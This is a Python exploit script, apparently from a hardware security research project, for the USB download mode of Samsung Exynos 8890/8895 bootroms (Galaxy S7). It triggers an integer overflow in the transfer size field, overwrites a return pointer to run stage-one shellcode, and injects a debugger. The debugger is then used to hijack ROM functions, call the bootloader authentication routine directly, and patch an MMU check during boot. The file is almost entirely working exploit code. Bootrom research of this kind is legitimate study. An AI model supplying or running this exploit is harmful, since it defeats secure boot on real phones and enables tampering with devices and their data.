Samsung_S7/source/exploit/exploit.py

from exynos import *

logger = setup_logger("") #Leave empty to get root logger
logger.setLevel(logging.DEBUG)

BLOCK_SIZE = 512
CHUNK_SIZE = 0xfffe00
MAX_PAYLOAD_SIZE = (BLOCK_SIZE - 10) # 512, - 10 for ready (4), size (4), footer (2)

DL_BUFFER_START = 0x02021800
DL_BUFFER_SIZE = 0x4E800 #max allowed/usable size within the buffer, with end at 0x02070000

BOOTROM_START = 0x0
BOOTROM_SIZE = 0x20000 #128Kb

TARGET_OFFSETS = {
    # XFER_BUFFER,	RA_PTR, XFER_END_SIZE
    "8890": (0x02021800, 0x02020F08, 0x02070000), #0x206ffff on exynos 8890
    "8895": (0x02021800, 0x02020F18, 0x02070000)
}

def wait_for_device():
    while usb.core.find(idVendor=0x04e8, idProduct=0x1234) is None:
        pass

def wait_disconnect():
    while usb.core.find(idVendor=0x04e8, idProduct=0x1234) is not None:
        pass

ENDPOINT_BULK_IN = 0x81
ENDPOINT_BULK_OUT = 0x2

ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
cs = Cs(CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN)

class S7Exploit(ExynosDevice):
    def __init__(self, idVendor=0x04e8, idProduct=0x1234):
        super().__init__(idVendor, idProduct)

    def send_empty_transfer(self):
        """Send an empty transfer (to not actually write data)"""
        transferred = ctypes.c_int()
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
        assert(res == 0)
        return transferred.value

    def test_bug_2(self):
        """Interger overflow in last packet if reamining size is 1."""
        transferred = ctypes.c_int()
        bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
        bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
        assert res == 0

        payload = b"\xaa" * 0x200
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
        assert res == 0

        payload = b"\xaa" * 0x200
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
        while True:
            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)

    def test_bug(self):
        """Verify bug existence"""
        # Start by sending a valid packet
        # Integer overflow in the size field
        # unk + size + payload + header
        payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)

        assert (len(payload) == BLOCK_SIZE)
        res = self.write(payload, MAX_PAYLOAD_SIZE)

        for i in range(200):
            print(hex(self.send_empty_transfer()))

        print('Bug probably available')
        sys.exit(0)


    def send_normal_stage(self, payload):
        """Send next boot stage to the device"""
        # construct dl_data
        dpayload = struct.pack("<II", 0, (len(payload) + 8 + 2))
        dpayload = dpayload + payload + b"\x00" * 2 # add footer
        transferred = ctypes.c_int()
        for block in range(0, len(dpayload), BLOCK_SIZE):
            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, dpayload[block:block + BLOCK_SIZE], len(dpayload[block:block + BLOCK_SIZE]), ctypes.byref(transferred), 0)
            assert res == 0, "Error sending payload"
        p_ok("Sent stage")


    def unsecure_boot(self, exploit=False):
        '''
        Do a normal boot process, with or without exploit.
        '''
        if exploit:
            self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read())
            time.sleep(2)
            self.connect_device()
        # self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin")
        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
        # self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
        # self.send_normal_stage(open("../../dump/rom.bin.1.bin", "rb").read())
        # wait_disconnect()
        time.sleep(2)
        self.connect_device()
        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
        # self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
        # wait_disconnect()
        time.sleep(2)
        self.connect_device()
        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
        # self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
        # wait_disconnect()
        time.sleep(2)
        self.connect_device()
        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
        # self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())
        pass


    def exploit(self, payload: bytes):
        '''
        Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
        '''
        assert len(payload) <= MAX_PAYLOAD_SIZE, "Shellcode too big"

        current_offset = TARGET_OFFSETS[self.target][0]
        xfer_buffer_start = TARGET_OFFSETS[self.target][1] # start of USB transfer buffer
        transferred = ctypes.c_int()

        size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 + 6 # max_uint32 -  header(8) + data(n) + footer(2)
        #size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8
        max_payload_size = 0x100000000 - size_to_overflow
        ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) #

        # Assert that payload is 502 bytes
        payload = payload + ((max_payload_size - len(payload)) * b"\x00")
        assert len(payload) == max_payload_size, "Invalid payload. Size is wrong"

        # First send payload to trigger the bug
        bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
        bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
        assert res == 0, "Error triggering payload"
        assert transferred.value == len(bug_payload), "Invalid transfered size"
        current_offset += len(bug_payload) - 8  # Remove header

        cnt = 0
        while True:
            if current_offset + CHUNK_SIZE >= xfer_buffer_start and current_offset < xfer_buffer_start:
                break
            self.send_empty_transfer()
            current_offset += CHUNK_SIZE
            cnt += 1
            if current_offset > 0x100000000:
                current_offset = current_offset - 0x100000000 #reset 32 byte integer
            print(f"{cnt} {hex(current_offset)}")

        remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
        assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
        if remaining > BLOCK_SIZE:
            self.send_empty_transfer()
            # Send last transfer, TODO who aligns this ROM??
            current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
            cnt += 1
            print(f"{cnt} {hex(current_offset)}")

        # Build ROP chain.
        rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
        transferred = ctypes.c_int(0)
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
        assert res == 0, "Error sending ROP chain"
        return




    def setup_concrete_device(self, concrete_device : ConcreteDevice):
        #Setup architecture
        concrete_device.arch = QL_ARCH.ARM64
        concrete_device.ga_debugger_location = 0x2069000  # TODO, not used yet
        concrete_device.ga_vbar_location = 0x206d000 + 0x1000
        concrete_device.ga_storage_location = 0x206d000
        concrete_device.ga_stack_location = 0x206b000

        concrete_device.arch_dbg = GA_arm64_debugger(concrete_device.ga_vbar_location, concrete_device.ga_debugger_location, concrete_device.ga_storage_location)
        concrete_device.arch_dbg.read = self.usb_read
        concrete_device.arch_dbg.write = self.usb_write

        #Overwrite all calls to make the concrete target function properly
        concrete_device.copy_functions()


    def usb_debug(self):
        """
        Function to debug USB behaviour. Sends and receives data in continuous flow.
        """
        transferred = ctypes.c_int()
        # Send some data
        count = 0
        def _send_data():
            transferred.value = 0
            p = p32(count) + b"\xaa" * (0x200 - 4)
            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
            assert res == 0, f"Error sending data ({res})"

        def _recv_data():
            transferred.value = 0
            buf = ctypes.c_buffer(b"", 0x200)
            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
            assert res == 0, f"Error receiving data ({res})"
            hexdump(buf.raw)

        # Should have received some bytes
        while True:
            _send_data()
            _recv_data()
            count += 1


    def dump_memory(self, start: hex=0x0, end: hex=0x02070000, write=False):
        """
        Dumps memory from the device.

        Transfer XFER_BUFFER at 0x02021800, to: 0x02020F08. End of memory at 0x0206ffff.
        """
        dumped = b""
        # Read data from memory
        try:
            for block in tqdm.tqdm(range(start, end, 0x6000)):
                dump = self.cd.memdump_region(block, 0x6000)
                dumped += dump
        except:
            print("Error reading memory, at block: ", hex(block))
        return dumped


    def setup_guppy_debugger(self):
        """
        Sets up guppy debugger on the device itself.
        """

        def _setup_debugger():
            '''
            Setup the debugger as a concrete device
            '''
            self.cd = ConcreteDevice(None, False)
            self.cd.dev = self.setup_concrete_device(self.cd)
            self.cd.test_connection()


        def _initial_run_debugger():
            """Write debugger to device and test basic functionality"""
            ### Setup debugger
            if os.getenv("USER") == "eljakim":
                    debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
            else:
                try:
                    debugger = open("../../dump/debugger.bin", "rb").read()
                except Exception as e:
                    print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
                    sys.exit(0)

            debugger += ((0x2000 - len(debugger)) * b"\x00")
            assert len(debugger) == 0x2000, "Invalid debugger size, stage1 requires 0x2000 size"
            for block in range(0, len(debugger), 0x200):
                self.usb_write(debugger[block:block+0x200])
            # time.sleep(.5) # Wait a little bit
            assert self.usb_read(0x200) == b"GiAs", "No response from debugger"

            # Test basic functionality
            self.usb_write(b"PING")
            r = self.usb_read(0x200)
            assert r == b"PONG", f"Invalid response from device: {r}"

        _initial_run_debugger()
        _setup_debugger()


    def relocate_debugger(self, debugger=None, entry=0x020c0000, storage=0x020c4000, g_data_received=0x020c6000, alternative_size=0x1000):
        """
        Relocates the debugger to another location. Make sure to have built the debugger with the correct addresses!

        Args:
            - debugger: The debugger to relocate. If None, it will use the default debugger.
            - entry: The entry point of the debugger.
            - storage: The storage location of the debugger.
            - g_data_received: The location of the data received.
        """
        if debugger is None:
            if os.getenv("USER") == "eljakim":
                debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
            else:
                try:
                    debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
                except Exception as e:
                    print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
                    sys.exit(0)
        else:
            debugger_reloc = debugger

        self.cd.memwrite_region(entry, debugger_reloc)
        # self.usb_write(b"FLSH") # Flush cache
        self.cd.restore_stack_and_jump(entry)
        assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
        self.cd.relocate_debugger(g_data_received+alternative_size, entry, storage) #0x20c7000, 0x20c0000, 0x20c4000


    def dumb_interact(self, dump_imems=False):
        '''
        Room for playing around with the debugger on the phone.
        '''
        self.cd.arch_dbg.state.auto_sync = False
        self.cd.arch_dbg.state.auto_sync_special = False
        logger.debug('State after setting up initial debugger')
        self.cd.arch_dbg.state.print_ctx()

        def first_debugger():
            debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
            self.cd.memwrite_region(0x2069000, debugger)
            self.cd.restore_stack_and_jump(0x2069000)
            assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
            self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000)

        # self.relocate_debugger()
        DEBUGGER_ADDR = 0x2069000 #0x020c0000

        ### Get whereabouts of the debugger and current processor state
        logger.debug('State after relocating debugger')
        self.cd.arch_dbg.state.print_ctx()

        def memdump_imem():
            """
            Dumps the internal memory of the device (0x2020000 - 0x2070000).
            """
            dumped = b""
            for block in range(0x2020000, 0x2070000, 0x200):
                # print(hex(block))
                dumped += self.cd.memdump_region(block, 0x200)
            return dumped

        AUTH_BL1 = 0x00012848 # Location of the authentication function
        def auth_bl1(lr=0x2069000):
            # Load the firmware
            self.cd.arch_dbg.state.X0 = 1
            self.cd.arch_dbg.state.X1 = 1
            self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
            self.cd.restore_stack_and_jump(AUTH_BL1)
            assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
            assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"

        BOOT_BL1 = 0x00019310 # Location of the boot function
        def boot_bl1(lr=0x2069000):
            self.cd.arch_dbg.state.LR = lr
            self.cd.restore_stack_and_jump(BOOT_BL1)
            assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"

        JUMP_BL1 = 0x000002c0 # Location of the function to start the BL1 boot
        def jump_bl1(lr):
            self.cd.arch_dbg.state.LR = lr
            self.cd.restore_stack_and_jump(JUMP_BL1)

        # Always hijack rom_usb_download function:
        rom_usb_download = self.cd.memdump_region(0x020200dc, 4)
        self.cd.memwrite_region(0x020200dc, p32(0x2069000))

        # Try loading bl1
        bl1 = open("../S7/bl1.bin", "rb").read()
        self.cd.memwrite_region(0x02021800, bl1)
        self.usb_write(b"FLSH") # Flush cache, as Frederic does
        self.cd.test_connection()
        auth_bl1(DEBUGGER_ADDR)
        # boot_bl1(DEBUGGER_ADDR)
        self.cd.memwrite_region(0x02022858, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR)) # jump to debugger on next stage download
        self.cd.memwrite_region(0x020219cc, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
        jump_bl1(DEBUGGER_ADDR)

        # Returns on usb_download function
        assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
        self.cd.arch_dbg.state.print_ctx()
        dl_ready, next_stage = struct.unpack("<II", self.cd.memdump_region(0x02021518, 8))
        bl31 = open("../S7/bl31.bin", "rb").read()
        self.cd.memwrite_region(0x02024000, bl31)
        self.cd.memwrite_region(0x02021518, p32(1)) # Set dl_ready to 1
        self.cd.memwrite_region(0x02021518 + 4 , p32(self.cd.arch_dbg.state.X0))

        self.cd.arch_dbg.state.X0 = 0
        self.cd.restore_stack_and_jump(0x020219c8)
        pass

        # assert len(bl31) % 0x200 == 0, "Size needs to be 512 bytes aligned"
        # self.cd.memwrite_region(self.cd.arch_dbg.state.X0, p32(147456)) # Update amount of blocks

        # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
        # self.cd.restore_stack_and_jump(0x02022a08)
        # Patches
        # self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
        # self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))

        # Patch stupid error function
        # self.usb_write(b"FLSH") # Flush cache

        # Download next stage?
        lr = self.cd.arch_dbg.state.LR
        # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
        pass

        # Overwrite jump back to the debugger from functions encountered during jump_bl1
        self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
        self.cd.memwrite_region(0x020200dc, p32(0x020c0000))

        def hijack_brom_weird():
            print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}")
            self.cd.restore_stack_and_jump(0x00000314)

        jump_bl1(0x020c0000)
        def handle_weird_brom():
            while True:
                try:
                    resp = self.usb_read(0x200)
                    logging.debug(f'Within jump_bl1. Response: {resp}.')
                    if self.cd.arch_dbg.state.LR == 0x02022948:
                        break # ROM will load next stage over USB
                    hijack_brom_weird()
                except Exception as e:
                    pass
        handle_weird_brom()

        ### For getting special registers. Non-writeable registers are detected. (UXN, PXN, etc)
        # self.cd.jump_to(0x2069000)
        # assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
        # self.cd.fetch_special_regs()

        self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)

        self.cd.arch_dbg.state.X0 = 1
        self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR)
        self.usb_read(0x200) # GiAs

        self.cd.arch_dbg.state.LR = 0x2069000
        self.cd.restore_stack_and_jump(0x00000314)
        pass

        ### UXN and PXN seem to be present over the USB stack (02021800+)
        shellcode = f"""
        ldr x0, debugger_addr
        blr x0
        debugger_addr:   .quad 0x02022000
        """

        shellcode = ks.asm(shellcode, as_bytes=True)[0]
        self.cd.memwrite_region(0x2021800, shellcode)

        self.cd.jump_to(0x2021800)
        pass

        # bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
        # # Write bl31 at 0x02021800 and authenticate

        auth_bl1(0x020c0000)

        # Jump to bl31
        jump_bl1(0x02021800)
        pass

        # VERY OLD

        #000125b4
        # self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
        # self.cd.restore_stack_and_jump(0x00012814)
        # self.cd.restore_stack_and_jump(0x000125b4)


    def disable_mmu(self, address=0x02060000):
        # ================= WORKS TO DISABLE DEBUGGER. BUT UNNECESSARY =================
        # Disable MMU and branch to 0x02048000
        shellcode=f"""
        mrs     x0, sctlr_el3
        bic     x0, x0, #1
        msr     sctlr_el3, x0
        ldr     x0, =0x2048000
        br      x0
        """
        shellcode = ks.asm(shellcode, as_bytes=True)[0]
        self.cd.memwrite_region(address, shellcode)
        self.cd.jump_to(address)
        time.sleep(1)
        self.usb_read(0x200) # GiAs
        self.cd.arch_dbg.fetch_special_regs()
        print(f'MMU is {hex(self.cd.arch_dbg.state.R_SCTLR_EL3.mmu)} (0x1=enabled, 0x0=disabled)')


    def get_ttbr0_el3(self):
        """
        Get the TTBR0_EL3 register using opcode.
        """
        shellcode= f"""
        mov     x1, lr
        mrs     x0, ttbr0_el3
        ldr     x2, =0x206fd10
        str     x0, [x2]
        mov     lr, x1
        ret
        """
        shellcode = ks.asm(shellcode, as_bytes=True)[0]
        self.cd.memwrite_region(0x206ed10, shellcode)
        self.cd.jump_to(0x0206ed10)
        ttbr0 = u64(self.cd.memdump_region(0x0206fd10, 0x8))
        print(f"TTBR0_EL3: {hex(ttbr0)}")
        print(f"Bits: {ttbr0:064b}")

        # Overwrite it with 0's
        self.cd.memwrite_region(0x0206ed10, b"\x00" * 0x8)
        ttbr0 = self.cd.memdump_region(0x206ed10, 0x8)
        assert ttbr0 == b"\x00" * 0x8, "TTBR0_EL3 not overwritten"


    def test_write_execute(self, address, execute=True):
        """
        At given address, test if it is possible to write and execute code, by writing a simple jump to, and jump back.
        """
        self.usb_write(b'PING')
        assert self.usb_read(0x200) == b'PONG', "Debugger not alive before test"

        shellcode = f"""
        mov     x1, lr
        ret
        """

        shellcode = ks.asm(shellcode, as_bytes=True)[0]
        self.cd.memwrite_region(address, shellcode)
        if execute:
            self.cd.jump_to(address)
            self.usb_write(b"PING")
            assert self.usb_read(0x200) == b"PONG", "Failed to jump back to debugger"
            print(f'Jumped to {hex(address)} and back')


    def debugger_boot(self):
        """
        Boot into USB recovery mode using the debugger.
        """
        # Setup initial debugger
        self.setup_guppy_debugger()
        self.cd.arch_dbg.state.auto_sync = False
        self.cd.arch_dbg.state.auto_sync_special = False
        logger.debug('State after setting up initial debugger')
        self.cd.arch_dbg.state.print_ctx()
        DEBUGGER_ADDR = 0x2069000 # 0x2069000

        # Dump contents of TTBR0_EL3 from memory into a pandas dataframe and write it to a pickle file
        #import pandas as pd
        #blub = self.cd.memdump_region(0x02035000, 0x1000)
        #try:
        #    df = pd.read_pickle('ttbr0_el3.pkl')
        #    # Concat data to existing dataframe
        #    df = pd.concat([df, pd.Series([blub])], ignore_index=True)
        #except:
        #    df = pd.DataFrame()
        #    df['TTBR0_EL3'] = [blub]
        #df.to_pickle('ttbr0_el3.pkl')

        # Relocate debugger
        debugger = open("../../dump/reloc_debugger_0x11200000.bin", "rb").read()
        self.relocate_debugger(debugger=debugger, entry=0x11200000, storage=0x11203000, g_data_received=0x11204000)
        DEBUGGER_ADDR = 0x11200000

        # Load bootloader stages

        bl1 = open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read()
        bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
        bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
        bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
        if args.MIB3:
            bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
            bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
            bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read()
            bl33 = open("../mib3/boot_partitions/u-boot_a.bin", "rb").read()

        # Test debugger connection
        self.cd.test_connection()

        # ==== BL1 ====
        ### Overwrite boot_usb_ra to our debugger
        hijacked_usb_ra = self.cd.memdump_region(0x02020f60, 8)
        self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))

        ### Set link register and boot into the USB function
        BOOT_USB_FUNCTION = 0x000064e0
        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
        self.cd.restore_stack_and_jump(BOOT_USB_FUNCTION)

        # Wait for device return (happens after each download)
        time.sleep(1)
        self.connect_device()

        # Send boot stage 1
        self.send_normal_stage(bl1)
        assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"

        # Setup jump and bl_auth
        AUTH_BL1 = 0x00012848 # Location of the authentication function
        def auth_bl1(lr=0x2069000, x0=1, x1=1):
            # Load the firmware
            self.cd.arch_dbg.state.X0 = x0
            self.cd.arch_dbg.state.X1 = x1
            self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
            self.cd.restore_stack_and_jump(AUTH_BL1)
            assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
            ### Check if authentication was successful - X0 should not be 0??
            # assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"

        # BL1 is loaded, now authenticate and patch it
        auth_bl1(DEBUGGER_ADDR)
        self.usb_write(b"FLSH") # Flush cache (Frederic does this..)

        # Hijack ROM download function
        hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4))
        self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31

        BL1_POINTER = 0x02021880
        if args.MIB3:
            BL1_POINTER = 0x02021890

        self.cd.memwrite_region(BL1_POINTER, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))

        # Write a patch to BL1 in memory
        # self.cd.memwrite_region(0x2021800+bl1.find(b'2015'), b'2014')

        # Jump into BL1 (sboot.bin.1.bin)
        JUMP_BL1 = 0x000002c0
        def jump_bl1(lr):
            self.cd.arch_dbg.state.LR = lr
            self.cd.restore_stack_and_jump(JUMP_BL1)

        # And jump into BL1 to execute it
        jump_bl1(DEBUGGER_ADDR)

        # ==== BL31 ====
        # Assure that the debugger is still alive
        assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"

        # Get current LR, and store it. Then set LR to debugger.
        lr = self.cd.arch_dbg.state.LR
        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
        self.cd.restore_stack_and_jump(hijacked_fun) # will jump back to debugger after downloading the next stage (before executing it)

        # After downloading the next stage, make sure the device reconnects
        time.sleep(2)
        self.connect_device()
        self.send_normal_stage(bl31)
        time.sleep(2)

        # Assure that the debugger is returning (obligatory assuration)
        self.usb_read(0x200) # GiAs

        # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # to restore the oginal boot flow, without getting back to the debugger

        # Set LR to continue boot flow
        self.cd.restore_stack_and_jump(lr)

        # Assure return to debugger
        time.sleep(2)
        self.usb_read(0x200) # GiAs
        # self.cd.memwrite_region(0x02031008, b"ELH")

        # Get pointer to BL31
        BL31_POINTER = self.cd.arch_dbg.state.LR

        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
        TTBR0_EL3 = 0x02035600 # Zeroed out

        # Modifies/disables setting up MMU (but is set up eventually) -> MMU says 0x0 instead of 0x1, but still little access (and proper USB recovyer boot!?)
        MMU_CHECK = 0x020244e8
        if args.MIB3:
            MMU_CHECK = 0x0202a314
        self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false

        # DWC3 OTG update mode -> Might be useful at some point?
        # self.cd.memwrite_region(0x02021580, struct.pack('>I', 0x00000000))

        # Jump into BL31 and execute it
        #BL31_POINTER = 0x02024010
        #if args.MIB3:
        #    BL31_POINTER = 0x020c0000
        self.cd.restore_stack_and_jump(BL31_POINTER)

        # Obligatory reconnect and check of debugger
        time.sleep(2)
        self.connect_device()
        self.usb_read(0x200) # GiAs
        BL31_ra = self.cd.arch_dbg.state.LR

        self.cd.arch_dbg.fetch_special_regs()
        print(f'MMU is {hex(self.cd.arch_dbg.state.R_SCTLR_EL3.mmu)} (0x1=enabled, 0x0=disabled)')
        print(f'TTBR0_EL3: {hex(self.cd.arch_dbg.state.TTBR0_EL3)}, TTBR1_EL2: {hex(self.cd.arch_dbg.state.TTBR0_EL2)}, TTBR0_EL1: {hex(self.cd.arch_dbg.state.TTBR0_EL1)}')
        print(f'VBAR_EL3: {hex(self.cd.arch_dbg.state.VBAR_EL3)}, VBAR_EL2: {hex(self.cd.arch_dbg.state.VBAR_EL2)}, VBAR_EL1: {hex(self.cd.arch_dbg.state.VBAR_EL1)}')
        print(f'TCR_EL3: {hex(self.cd.arch_dbg.state.TCR_EL3)}, TCR_EL2: {hex(self.cd.arch_dbg.state.TCR_EL2)}, TCR_EL1: {hex(self.cd.arch_dbg.state.TCR_EL1)}')
        print(f'SCTLR_EL3: {hex(self.cd.arch_dbg.state.SCTLR_EL3)}, SCTLR_EL2: {hex(self.cd.arch_dbg.state.SCTLR_EL2)}, SCTLR_EL1: {hex(self.cd.arch_dbg.state.SCTLR_EL1)}')
        print(f'MAIR_EL3: {hex(self.cd.arch_dbg.state.MAIR_EL3)}, MAIR_EL2: {hex(self.cd.arch_dbg.state.MAIR_EL2)}, MAIR_EL1: {hex(self.cd.arch_dbg.state.MAIR_EL1)}')
        print(f'Current EL: {hex(self.cd.arch_dbg.state.CURRENT_EL)}')

        # self.cd.arch_dbg.fetch_special_regs() # -> Does not work with original debugger (?->memory overlap somewhere). Only with relocated debugger.
        VBAR_EL3 = self.cd.arch_dbg.state.VBAR_EL3

        self.test_write_execute(0x11207010)

        if args.MIB3:
            self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
        self.cd.restore_stack_and_jump(hijacked_fun)

        # ==== Stage 4 BL2 ====
        self.send_normal_stage(bl2)
        time.sleep(2)
        self.connect_device()
        self.usb_read(0x200) # GiAs

        self.cd.arch_dbg.fetch_special_regs()
        print(f'MMU is {hex(self.cd.arch_dbg.state.R_SCTLR_EL3.mmu)} (0x1=enabled, 0x0=disabled)')
        print(f'TTBR0_EL3: {hex(self.cd.arch_dbg.state.TTBR0_EL3)}, TTBR1_EL2: {hex(self.cd.arch_dbg.state.TTBR0_EL2)}, TTBR0_EL1: {hex(self.cd.arch_dbg.state.TTBR0_EL1)}')
        print(f'VBAR_EL3: {hex(self.cd.arch_dbg.state.VBAR_EL3)}, VBAR_EL2: {hex(self.cd.arch_dbg.state.VBAR_EL2)}, VBAR_EL1: {hex(self.cd.arch_dbg.state.VBAR_EL1)}')
        print(f'TCR_EL3: {hex(self.cd.arch_dbg.state.TCR_EL3)}, TCR_EL2: {hex(self.cd.arch_dbg.state.TCR_EL2)}, TCR_EL1: {hex(self.cd.arch_dbg.state.TCR_EL1)}')
        print(f'SCTLR_EL3: {hex(self.cd.arch_dbg.state.SCTLR_EL3)}, SCTLR_EL2: {hex(self.cd.arch_dbg.state.SCTLR_EL2)}, SCTLR_EL1: {hex(self.cd.arch_dbg.state.SCTLR_EL1)}')
        print(f'MAIR_EL3: {hex(self.cd.arch_dbg.state.MAIR_EL3)}, MAIR_EL2: {hex(self.cd.arch_dbg.state.MAIR_EL2)}, MAIR_EL1: {hex(self.cd.arch_dbg.state.MAIR_EL1)}')
        print(f'Current EL: {hex(self.cd.arch_dbg.state.CURRENT_EL)}')

        # Restore bootflow
        print(self.cd.arch_dbg.state.print_ctx())
        BL33_ptr = self.cd.arch_dbg.state.X0
        BL33_LR = self.cd.arch_dbg.state.LR
        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR

        # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)
        # Disable this to keep access to the debugger after senindg the next stage
        self.cd.arch_dbg.state.X23 = DEBUGGER_ADDR # TEMPORARY

        self.cd.restore_stack_and_jump(hijacked_fun)
        time.sleep(1)
        self.connect_device()
        
        self.send_normal_stage(bl33) # Never return/completes
        self.connect_device()
        self.usb_read(0x200) # GiAs

        # print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read()
